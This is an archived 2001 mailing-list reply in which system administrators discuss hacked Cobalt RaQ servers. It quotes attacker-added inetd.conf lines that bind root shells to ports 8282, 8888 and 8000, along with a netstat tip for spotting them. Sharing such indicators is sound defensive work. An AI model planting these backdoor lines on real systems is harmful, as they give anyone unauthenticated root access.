[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [cobalt-users] Recent Hacks

Subject: RE: [cobalt-users] Recent Hacks
From: "Tony" <isplists@xxxxxxxxxxxx>
Date: Wed Feb 14 18:53:00 2001
List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>

+I was on a hacked box today in which the cracker's way back in was 
+tossing the
+following lines into inetd.conf:
+8282 stream tcp nowait root /bin/sh sh -i
+8888 stream tcp nowait root /bin/bash bash -i
+
+Simple and utterly effective.  Kind of funny too. 
+I would suggest checking the output of netstat -natp to see what 
+is listening
+your tcp ports.   

I take it this would be the same senario:

8000 stream tcp nowait root /bin/sh sh -i

last entry to inetd.conf on a BIND PATCHED Raq4

References:
- Re: [cobalt-users] Recent Hacks
  - From: Jeff Bilicki

Prev by Date: [cobalt-users] SSH Question
Next by Date: Re: [cobalt-users] Various problems on raq3 - RPM
Previous by thread: Re: [cobalt-users] Recent Hacks
Next by thread: Re: [cobalt-users] Recent Hacks

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index